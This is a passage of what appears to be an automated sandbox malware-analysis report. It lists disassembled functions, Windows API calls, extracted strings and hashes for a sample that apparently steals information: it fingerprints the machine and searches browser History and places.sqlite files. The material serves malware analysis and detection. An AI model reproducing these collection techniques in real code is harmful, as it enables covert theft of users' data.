Instruction ID: 809722c095ea45080b132ee1ecccaea0ad8e4e48b5b2181e80121cad3d0a43f6
Opcode Fuzzy Hash: 6827334effe1af4081dab58951797ab719276b71555c5be752b1280ab307ebe8
Instruction Fuzzy Hash: E6D012F42001025AD7489F198555A37776E5BD1700368C6BEA101BF2D5DB39E841EB34

Function 00407500 Relevance: 3.1, APIs: 2, Instructions: 76
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102

RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,?), ref: 00407582
RegQueryValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,000000FE), ref: 004075A9

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: AllocOpenQueryStringValue
String ID:
API String ID: 4139485348-0
Opcode ID: 3ed5b2ee1dba194cc6dbe336fcadb55ada54ae4c4b70a41d90ff88955bf18e37
Instruction ID: a534eb6d79e9af16e12b264bd48d331209bfd9d9316274433d90d6d6e5d4440a
Opcode Fuzzy Hash: 3ed5b2ee1dba194cc6dbe336fcadb55ada54ae4c4b70a41d90ff88955bf18e37
Instruction Fuzzy Hash: 1921C771A04109AFD700EB99CD81EEEBBFCEB48304F504576B904E7691D774AE448A65

Function 004033F4 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 00403479
ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 004034AE

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: ExitFreeLibraryProcess
String ID:
API String ID: 1404682716-0
Opcode ID: 8728ad655b3e503d2fdb3a62f9eb409c209a4d433934cda3c6acf7bd146207aa
Instruction ID: 759013028fc8479fd2dc72d2fd20690e0ff356ad8f398ebd0a8dd26c183a4070
Opcode Fuzzy Hash: 8728ad655b3e503d2fdb3a62f9eb409c209a4d433934cda3c6acf7bd146207aa
Instruction Fuzzy Hash: 532162709002408BDB229F6584847577FD9AB49356F2585BBE844AF2C6D77CCEC0C7AD

Function 004033EC Relevance: 3.1, APIs: 2, Instructions: 66COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 00403479
ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 004034AE

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: ExitFreeLibraryProcess
String ID:
API String ID: 1404682716-0
Opcode ID: 12e1264d31eb56f2234adc36a07824a312904d80612c0ba461cf097056190f6f
Instruction ID: 6a24a9e445b26bd493014d0ae565dbad687ffc3c4e0e672e3f19fd4d116e45a8
Opcode Fuzzy Hash: 12e1264d31eb56f2234adc36a07824a312904d80612c0ba461cf097056190f6f
Instruction Fuzzy Hash: 082132709002408FDB229F6584847567FE9AF49316F1585BBE844AE2D6D77CCEC0C799

Function 004033F0 Relevance: 3.1, APIs: 2, Instructions: 64COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 00403479
ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 004034AE

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: ExitFreeLibraryProcess
String ID:
API String ID: 1404682716-0
Opcode ID: 48b7e33afc810a21c896a39620d19b1e342ee901d510fcbf56cb23baece62cc7
Instruction ID: 27f7e017d1627fb368da8b77f9887733e34b03074980a547fb73b729214f25e1
Opcode Fuzzy Hash: 48b7e33afc810a21c896a39620d19b1e342ee901d510fcbf56cb23baece62cc7
Instruction Fuzzy Hash: A42141709002408BDB229F6584847577FE9AF49316F2585BBE844AE2C6D77CCEC0CB9D

Function 00406DA8 Relevance: 3.1, APIs: 2, Instructions: 58registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102

RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,?), ref: 00406E08
RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406E2F

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: String$AllocFreeOpenQueryValue
String ID:
API String ID: 967375698-0
Opcode ID: 42e8ac0eb481dbdee281ab6c948f954a5f7be2f1dbc7aad8dbdbf02e747b1a52
Instruction ID: d76901b39ac324b957afaa178e8467113ca23e905bfc9c7565385042a447591e
Opcode Fuzzy Hash: 42e8ac0eb481dbdee281ab6c948f954a5f7be2f1dbc7aad8dbdbf02e747b1a52
Instruction Fuzzy Hash: 4E110A71600209AFD700EB99C991ADEBBFCEB48304F504176B504E3291D774AF048AA5

Function 00406DAC Relevance: 3.1, APIs: 2, Instructions: 58registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102

RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,?), ref: 00406E08
RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406E2F

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: String$AllocFreeOpenQueryValue
String ID:
API String ID: 967375698-0
Opcode ID: 2211f0de82845023bd4461a93eb36700242ae8860f2016ef3c98de18d7d5de81
Instruction ID: 82cb5f20ed390e82a860d028ca805bd23af48b7bdc57f11f8f6bbfe72b4b229b
Opcode Fuzzy Hash: 2211f0de82845023bd4461a93eb36700242ae8860f2016ef3c98de18d7d5de81
Instruction Fuzzy Hash: 0211EC75600209AFD701EB99CD81EDEBBFCEB48704F504576B504F3291DB74AF448AA5

Function 0078584C Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400), ref: 00785856
SetErrorMode.KERNEL32(00000000), ref: 0078585B

Memory Dump Source

Source File: 00000000.00000002.2059320017.0000000000783000.00000040.00000020.00020000.00000000.sdmp, Offset: 00783000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_783000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 84555313a3c31899c90153882680c87f0a272c1581caef67196d0cf2e76c0b39
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: F9D0123118522877D7002A95DC0DBCD7B5CDF05B63F048021FB0DD9080C774994047E5

Function 00401388 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013B7
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013DE

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
Instruction ID: a459bd48843060549903651ed84add4fd647ab7a4347e8b1aec55fdbd67c2c02
Opcode Fuzzy Hash: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
Instruction Fuzzy Hash: 72F0E972B0032017EB2055690CC1F5265C58B46760F14417BBE08FF7D9C6758C008299

Function 00784FFD Relevance: 1.5, APIs: 1, Instructions: 49libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 00784F47

Memory Dump Source

Source File: 00000000.00000002.2059320017.0000000000783000.00000040.00000020.00020000.00000000.sdmp, Offset: 00783000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_783000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: dbb718cec77b63f2c87692c5cf3c11fae30828a8f60476d1a53ae7f6434210d1
Instruction ID: 8463d9e6b5eb0fc51597dd317ed7278ab274739b09b443174cbf26f1e383fc68
Opcode Fuzzy Hash: dbb718cec77b63f2c87692c5cf3c11fae30828a8f60476d1a53ae7f6434210d1
Instruction Fuzzy Hash: 11212B75941229CFEB60DF68CD94F98B7B1BB09314F0485E6E60DAB251D634AE84DF20

Function 004065C4 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 1ebdfbd59a0e52ef2ea023c9a08e44020ac5f15f939b277ac4f00344f859253b
Instruction ID: cd992ebe0347ba42bda0945abe6e894bfe88d76707d831bffa21c0f3d5584e5e
Opcode Fuzzy Hash: 1ebdfbd59a0e52ef2ea023c9a08e44020ac5f15f939b277ac4f00344f859253b
Instruction Fuzzy Hash: 29E04FB12082425FD312EB98D880AA677E59F89300F05487AA885C72E1EE35DE649B57

Function 004065C8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: c1aec3d96d918917163645e1cef9db84c357628eb7c3e8a5af25ed4d30638381
Instruction ID: 47af1fdf1995f1dddaec203f3ca82799803cb6e69f4b63bfcad29cffb6660ea3
Opcode Fuzzy Hash: c1aec3d96d918917163645e1cef9db84c357628eb7c3e8a5af25ed4d30638381
Instruction Fuzzy Hash: D9E08CB12042025BE310EA98D880AA6B2D89F88300F01483AB889C73D0FE39DE648A57

Function 00403604 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000003,00000000,?,?,00000000,00000001,00000000,00000000,00000001,004036B0,00000000), ref: 0040361A

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
Instruction ID: 7e1ccd6cea493bd3454663dff710d39ec61ca1bdc7a044e150527f2c3e7482f1
Opcode Fuzzy Hash: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
Instruction Fuzzy Hash: 1EC002B22802087FE5149A9ADC46FA7769C9758B50F108029B7089E1D1D5A5B85046BC

Function 00421AC1 Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(00000040,?), ref: 00421AD7

Memory Dump Source

Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 19771ce88e7a3992dc5f04f66db4136d51769723e0a9caa8c6ec8de04c0ecc5c
Instruction ID: 1623b29cf8142295aa0f5df72f69ac979d577d88d800b5c0b7e759b5a6e1f0e4
Opcode Fuzzy Hash: 19771ce88e7a3992dc5f04f66db4136d51769723e0a9caa8c6ec8de04c0ecc5c
Instruction Fuzzy Hash: 70C08CB180010CBBDB019B82ED07E6A3BACE304605F0000B0B702A50B1D6B2F900AB6E

Function 00401464 Relevance: 1.3, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004014C8

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
Instruction ID: bdb72b2e4f8392e9a4367bae485781504843fed35f2e07c9585e1bdde9d69fdb
Opcode Fuzzy Hash: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
Instruction Fuzzy Hash: 2621F770608710AFC710DF19C8C0A5BBBE5EF85760F14C96AE4989B3A5D378EC41CB9A

Function 004015B0 Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(00000000,00000000,00004000,?,0000000C,?,-00000008,00003FFB,00401817), ref: 0040160A

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
Instruction ID: 104411973d7795ae4b76250d277c099600c8cf09cd5a8da0f47b470ca133b76a
Opcode Fuzzy Hash: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
Instruction Fuzzy Hash: 82012B726443105FC3109F28DDC0E6A77E5DBC5324F19493EDA85AB391D33B6C0187A8

Non-executed Functions

Function 00414408 Relevance: 16.2, APIs: 4, Strings: 5, Instructions: 496fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,0041A69E), ref: 004145C5

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E

Strings

0_@, xrefs: 00414BBB, 00414BD1
CA, xrefs: 004144DA, 00414580, 00414A89, 00414BEC
LLA, xrefs: 00414C04
._., xrefs: 0041485D
.LNK, xrefs: 00414788

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: FreeString$FileFindFirst
String ID: .LNK$._.$0_@$LLA$CA
API String ID: 1653790112-882170572
Opcode ID: eabfcec7a1b34a96f3a487c33c476ef2dae85da7546450ac9a0750b76edb40a6
Instruction ID: 9c4ae2fa8e47753b2fad7318643bbdaa039e98a1c6b9804601cb0bccf78cece1
Opcode Fuzzy Hash: eabfcec7a1b34a96f3a487c33c476ef2dae85da7546450ac9a0750b76edb40a6
Instruction Fuzzy Hash: 6A224374A0011E9BCB10EF55C985ADEB7B9EF84308F1081B7E504B7296DB38AF858F59

Function 00416740 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 116COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C

Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

CPU Count: , xrefs: 004167EF
GetRAM: , xrefs: 00416833
UHJvY2Vzc29yTmFtZVN0cmluZw==, xrefs: 0041678C
CPU Model: , xrefs: 0041677E
SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==, xrefs: 004167A8
Video Info, xrefs: 00416856

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: FreeString$InfoSystem
String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
API String ID: 4070941872-1038824218
Opcode ID: 994227d9c169a1dbbd8c134888da1df913b25c71fc93550dee7adeb46b23c78b
Instruction ID: ec5783c0b7ca42e81122729fbed3a1ddf4b85dfc6774dd9c704540b43fb157b1
Opcode Fuzzy Hash: 994227d9c169a1dbbd8c134888da1df913b25c71fc93550dee7adeb46b23c78b
Instruction Fuzzy Hash: 64411270A1010D9BDB01FFD1D882ADDBBB9EF48309F51403BF504B7296D639EA458B59

Function 00404C15 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00402A94: GetKeyboardType.USER32(00000000), ref: 00402A99
Part of subcall function 00402A94: GetKeyboardType.USER32(00000001), ref: 00402AA5

GetCommandLineA.KERNEL32 ref: 00404C7B
GetVersion.KERNEL32 ref: 00404C8F
GetVersion.KERNEL32 ref: 00404CA0
GetCurrentThreadId.KERNEL32 ref: 00404CDC

Part of subcall function 00402AC4: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
Part of subcall function 00402AC4: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
Part of subcall function 00402AC4: RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F

GetThreadLocale.KERNEL32 ref: 00404CBC

Part of subcall function 00404B4C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404BB2), ref: 00404B72

Strings

%u, xrefs: 00404C80

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
String ID: %u
API String ID: 3734044017-749584840
Opcode ID: f73d26185257f265a94a8c873c422c92913b77d5a1c3acb43c070b40e0b1affb
Instruction ID: 5abcdb9b335a34f550fa88bee7db3b3d0fbbcc1143cdfce7353ba034968c2f47
Opcode Fuzzy Hash: f73d26185257f265a94a8c873c422c92913b77d5a1c3acb43c070b40e0b1affb
Instruction Fuzzy Hash: C30112B0895341D9E714BFF29C863893E60AB89348F11C53FD2506A2F2D77D44449BAE

Function 00412D70 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 159fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,00412FE0,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,0041335C,00000000,00000000), ref: 00412E08

Strings

.txt, xrefs: 00412F18
\*.*, xrefs: 00412DEF
\History, xrefs: 00412EAE

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: FileFindFirst
String ID: .txt$\*.*$\History
API String ID: 1974802433-2232271174
Opcode ID: 60f1aed37e2e99f440532b90469936e73ba5a5dec6828e4ede608866b0779c33
Instruction ID: 31102d54a49b3a600332046a535115537665bbef1f46384b784085fa532e6d73
Opcode Fuzzy Hash: 60f1aed37e2e99f440532b90469936e73ba5a5dec6828e4ede608866b0779c33
Instruction Fuzzy Hash: 61516C70909259AFCB12EB61CC45BDDBB78EF45304F2041EBA508F7192DA789F898B19

Function 00412D9C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 141fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,00412FE0,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,0041335C,00000000,00000000), ref: 00412E08

Strings

.txt, xrefs: 00412F18
\*.*, xrefs: 00412DEF
\History, xrefs: 00412EAE

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: FileFindFirst
String ID: .txt$\*.*$\History
API String ID: 1974802433-2232271174
Opcode ID: 9e1fdcc0da242b739753036d29313186668cc0af82581ab44d3f55cd16266d53
Instruction ID: 28420ec06a4cf3b7f255eec712baa8d4c4073a44f08a77f37e2c3042b4162f15
Opcode Fuzzy Hash: 9e1fdcc0da242b739753036d29313186668cc0af82581ab44d3f55cd16266d53
Instruction Fuzzy Hash: 7C515D74904219ABDF10EF51CD45BCDBBB9EF48304F6041FAA508B2291DA789F958F18

Function 0041303C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 139fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,00413276,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,00413E3A,00000000,00000000), ref: 004130A8

Strings

.txt, xrefs: 004131AE
\*.*, xrefs: 0041308F
\places.sqlite, xrefs: 00413144

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: FileFindFirst
String ID: .txt$\*.*$\places.sqlite
API String ID: 1974802433-3919338718
Opcode ID: 57caf48ab4afc0b1baef0746783f85f9fbf3cd85722ed1048bbcffe4d93a662f
Instruction ID: 8aac54383f65123cc0eb0a4bac2364391818e056087fcce0e0ee32974804bc60
Opcode Fuzzy Hash: 57caf48ab4afc0b1baef0746783f85f9fbf3cd85722ed1048bbcffe4d93a662f
Instruction Fuzzy Hash: CB513A74904119ABDF10EF61CC45BCDBBB9EF44305F6081FAA508B3291DA39AF858F18

Function 004111C4 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 201fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,004118A0,00000000,00000000,00412524), ref: 0041122F

Part of subcall function 00410E70: GetTickCount.KERNEL32 ref: 00410EB4
Part of subcall function 00410E70: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30

FindNextFileW.KERNEL32(?,?,?,0041156C,?,0041156C,0041A69E,00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000,00000000), ref: 00411495
FindClose.KERNEL32(?,?,?,?,0041156C,?,0041156C,0041A69E,00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000), ref: 004114A6

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

\*.*, xrefs: 00411216
.txt, xrefs: 00411355, 00411444

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: FileFind$CloseCopyCountFirstFreeNextStringTick
String ID: .txt$\*.*
API String ID: 4269597168-2615687548
Opcode ID: 5eb2d59efa555ee89ed57af41da6cad216739ef9bb024f3ea898b5bc55f5b5a7
Instruction ID: 6859e3562032d776fa84e591ecfbf3afacee5e694faebf3c1d1cda20f45b7b98
Opcode Fuzzy Hash: 5eb2d59efa555ee89ed57af41da6cad216739ef9bb024f3ea898b5bc55f5b5a7
Instruction Fuzzy Hash: 6C810C7490021DABDF10EB51CC85BCDB77AEF84304F6041E6A608B62A2DB799F858F58

Function 0041158C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,0041237E,00000000,00000000,00000000), ref: 004115FB
FindNextFileW.KERNEL32(?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000), ref: 00411768
FindClose.KERNEL32(?,?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000), ref: 00411779

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

\*.*, xrefs: 004115E2
.txt, xrefs: 00411717

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstFreeNextString
String ID: .txt$\*.*
API String ID: 2008072091-2615687548
Opcode ID: 0f6dccddeca5cc831589218911d3f92bb29d96b4250bcad063a90af0a6f30303
Instruction ID: cb1fa36ef6bd00d28df09069f3f2ad3b15c2d413a197645ac6dab8893c9dac73
Opcode Fuzzy Hash: 0f6dccddeca5cc831589218911d3f92bb29d96b4250bcad063a90af0a6f30303
Instruction Fuzzy Hash: 1D514C7490411DABDF10EB61CC45BDDB779EF45304F2085FAA608B22A2DA389F858F18

Function 00411590 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 142fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,0041237E,00000000,00000000,00000000), ref: 004115FB
FindNextFileW.KERNEL32(?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000), ref: 00411768
FindClose.KERNEL32(?,?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000), ref: 00411779

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

\*.*, xrefs: 004115E2
.txt, xrefs: 00411717

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstFreeNextString
String ID: .txt$\*.*
